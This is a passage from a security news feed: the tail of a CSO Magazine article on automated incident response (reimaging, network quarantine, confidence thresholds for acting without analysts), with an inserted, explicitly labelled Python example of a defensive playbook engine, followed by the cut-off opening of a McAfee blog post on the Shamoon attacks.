A typical response would be to store a copy of the device image for later forensic analysis, wipe the machine, restore it from a clean image, and restore the user’s files from the latest backup. While this is all happening, the user might get sent to take some anti-phishing training so as to be more careful next time.

Automating this process is easier for some companies than others, said Clyde.

“Some have gone to complete virtual desktops,” he said. “In essence, their desktop is always available to be re-imaged, because the physical machine is just a host for the virtual desktop.”

Similarly, if a company has its employees use a cloud-based platform like Office 365 and saves all work documents on either their own servers, or in the cloud, then reimaging can also be relatively quick and easy.

In both cases, there’s less risk of losing valuable files in the process, which limits the damage done if it turns out there was no actual infection.

“At the very same time, we have heavy knowledge workers, say, someone in a marketing organization, who is constantly working on new ad copy and PowerPoint presentations,” he said. “These are still often stored, at many companies, locally on the individual machine. The idea of wiping that machine and losing a day’s work unnecessarily is putting some companies off of trying to adopt this.”

Isolating the threat

Another common technique for automated mitigation is to quarantine infected machines.

“You might not wipe it, but it won’t spread the infection any further,” he said.

But doing this requires more than just having endpoint protection in place, he said.

“It does require network access controls,” he said. “If you have a link between the detection of the infected endpoint, and the network access control system, that can automatically link back with network security products and actually keep that device from connecting to the network.”

But too often, when products that have those capabilities are deployed, they aren’t implemented.

“In some cases, there’s a bit of a check-the-box mentality,” he said. “And nobody is asking whether I’ve implemented the network access controls. They should add that to the check list.”

In a large organization, there could be an additional barrier to setting up these kinds of systems in that the people responsible for the networks and the people responsible for endpoints are two different groups.

“It requires cooperation,” he said, “and sometimes the cooperation is just too hard to get.”

In addition, there’s the question of how many devices have to be isolated, said Jon Oltsik, senior principal analyst at Enterprise Strategy Group.

“If I quarantine one system, that’s fine,” he said. “But if I’m quarantining more systems, it gets more complex.”

As the required response gets more extensive, the more complicated it gets, he said. “And the more confidence you have to have that you’re doing the right thing.”

Smart networks

There are many tools available today that can detect suspicious activity on the network.

“You see a person in marketing has launched a network scan – that shouldn’t happen, so you can quarantine that system,” said Oltsik. “Or you see systems beaconing out to known command and control servers, so you can stop them at the system level or the network level. That’s pretty routine, and there are lots of companies that do that.”

But the more sophisticated the attack, the harder it is to automate a response, he said.

That doesn’t mean network vendors aren’t trying.

Network security has been a hotbed of activity recently when it comes to automation, said ISACA’s Clyde.

“If you were to walk around the last RSA show, you would see network security company after network security company touting how they automate detection of attacks and in some cases automatically take action,” he said.

But opinion is divided as to whether this is a good idea.

“Some voice concerns about taking action without human involvement, especially if a system was not 100 percent deterministic,” he said. “They might get it wrong, and take some action that might block legitimate activity. But others are like, ‘The attackers move too quickly and we need automation.'”

If false positives are too high, companies prefer to send the alerts to analysts for manual response.

“We are making progress,” he said. “But the state of the art tends to be about detecting, and not taking action, except for cases where it’s 99.9 percent certain that it’s real.”
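The trade-offs the analysts describe here (act unattended only when the detector is “99.9 percent certain”, promote a manual playbook step to automatic only after hundreds of identical analyst approvals, and escalate rather than quarantine when many hosts are affected) can be expressed as a small playbook engine. The Python below is an added example, not code from any vendor or tool mentioned in this article; the playbooks, thresholds, detection events and the stand-in for the NAC/EDR call are all constructed for the illustration.

```python
from collections import Counter
from dataclasses import dataclass, field

AUTO_CONFIDENCE = 0.999   # act without a human only when "99.9 percent certain"
PROMOTE_AFTER = 500       # identical analyst approvals before a manual step becomes automatic
MAX_AUTO_ISOLATE = 5      # isolating more hosts than this at once is escalated, not automated

@dataclass
class Detection:
    host: str
    indicator: str          # selects the playbook, e.g. "internal_network_scan"
    confidence: float       # detector's certainty, 0..1
    hosts_affected: int = 1

@dataclass
class Step:
    name: str
    auto: bool              # True: safe to run unattended from day one

@dataclass
class Engine:
    playbooks: dict                                 # indicator -> [Step, ...]
    approvals: Counter = field(default_factory=Counter)
    actions: list = field(default_factory=list)     # (step name, host) executed so far
    queue: list = field(default_factory=list)       # (detection, remaining steps) for an analyst

    def is_automated(self, indicator, step):
        # A manual step is promoted once analysts have approved it PROMOTE_AFTER times
        return step.auto or self.approvals[(indicator, step.name)] >= PROMOTE_AFTER

    def handle(self, det):
        """Run what the playbook allows; return 'automated', 'partial' or 'escalated'."""
        steps = self.playbooks[det.indicator]
        if det.confidence < AUTO_CONFIDENCE or det.hosts_affected > MAX_AUTO_ISOLATE:
            self.queue.append((det, [s.name for s in steps]))   # whole case goes to a person
            return "escalated"
        for i, step in enumerate(steps):
            if not self.is_automated(det.indicator, step):
                self.queue.append((det, [s.name for s in steps[i:]]))   # hand over the rest
                return "partial"
            self.actions.append((step.name, det.host))   # stand-in for the NAC/EDR API call
        return "automated"

    def record_approval(self, indicator, step_name, times=1):
        """An analyst clicked 'yes' on this step; counts toward promoting it."""
        self.approvals[(indicator, step_name)] += times

    def automation_ratio(self, indicator):
        """Share of the playbook that now runs without a person, e.g. 0.8 for '80 percent'."""
        steps = self.playbooks[indicator]
        return sum(self.is_automated(indicator, s) for s in steps) / len(steps)

# Constructed playbooks following the reimage and quarantine workflows in the article
PLAYBOOKS = {
    "malware_on_endpoint": [
        Step("snapshot_disk_image", auto=True),
        Step("isolate_via_nac", auto=True),
        Step("wipe_and_reimage", auto=False),       # may destroy locally stored work
        Step("restore_user_files", auto=False),
        Step("assign_phishing_training", auto=True),
    ],
    "internal_network_scan": [Step("isolate_via_nac", auto=True), Step("open_ticket", auto=True)],
}

def demo():
    """Feed four constructed detections through the engine and return (engine, verdicts)."""
    eng = Engine(PLAYBOOKS)
    verdicts = [
        eng.handle(Detection("mkt-laptop-07", "internal_network_scan", 0.9995)),
        eng.handle(Detection("fin-ws-12", "malware_on_endpoint", 0.9999)),
        eng.handle(Detection("hr-ws-03", "malware_on_endpoint", 0.97)),              # too uncertain
        eng.handle(Detection("dc-core", "internal_network_scan", 1.0, hosts_affected=40)),
    ]
    return eng, verdicts
```

Running `demo()` isolates the scanning marketing laptop end to end, stops the malware playbook at the wipe step so a person can decide, and escalates both the low-confidence case and the 40-host case.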

Fortunately, because of improving technology, human analysts are able to handle and monitor a lot more than they could even a couple of years ago, he said.

“That’s the good news,” he said. “The bad news is, I’m not sure that we’re keeping up with the innovation on the attacker side.”


This article was written by Maria Korolov from CSO Magazine and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

McAfee Raises the Stakes Against Cyberespionage
https://securingtomorrow.mcafee.com/executive-perspectives/mcafee-raises-stakes-cyberespionage/
Wed, 03 May 2017 21:25:50 +0000

The post McAfee Raises the Stakes Against Cyberespionage appeared first on McAfee Blogs.
On November 17, 2016, Shamoon malware struck once more.

As with the first Shamoon assault five years ago, the target was Saudi Arabia. But while earlier attacks focused on critical oil and gas infrastructure, last fall’s campaigns targeted Saudi government institutions, financial services, and other sectors. The objective was to gather information on individuals and organizations and wipe critical systems clean. With aggressive assaults across such a broad scope of attack surfaces, the latest Shamoon campaigns were nothing short of attempts to disrupt an entire nation.

Such an effort isn’t audacious given other events over the last several months. We’ve heard the revelations about the breach at Yahoo, watched the Mirai DDoS attack disrupt huge swaths of the Internet, and tried to come to terms with a DNC hack that many say influenced the American democratic process. The re-emergence of Shamoon is just the latest reminder that life and liberty can be imperiled by cyber-attacks.

It’s time—once again—for all of us to raise the stakes in our cybersecurity fight. We must match the audacious efforts of our adversaries with our own.

On the heels of the “new” McAfee launch, we are taking an imp